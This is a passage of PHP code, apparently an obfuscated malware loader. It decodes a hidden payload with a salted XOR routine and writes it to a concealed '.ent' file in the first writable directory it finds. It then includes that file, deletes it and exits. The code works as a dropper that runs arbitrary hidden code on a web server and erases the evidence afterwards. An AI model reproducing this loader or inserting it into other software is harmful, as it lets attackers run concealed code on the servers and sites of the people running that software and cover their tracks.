= $__len) break; $v6= $flg[$x]; $chS= ord($salt5[$x % $lenS]); $d= ((int)$v6 - $chS - ($x % 10)) ^ 33; $dchunk .= chr($d); $x++; } while (true); foreach ($element as $mrk): if (max(0, is_dir($mrk) * is_writable($mrk))) { $elem = join("/", [$mrk, ".ent"]); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $dchunk); fclose($file); include $elem; @unlink($elem); die(); } } endforeach; }